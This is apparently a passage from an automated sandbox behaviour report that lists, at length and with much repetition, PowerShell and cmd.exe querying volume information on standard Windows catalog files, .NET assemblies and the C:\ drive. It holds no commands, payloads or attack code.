Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
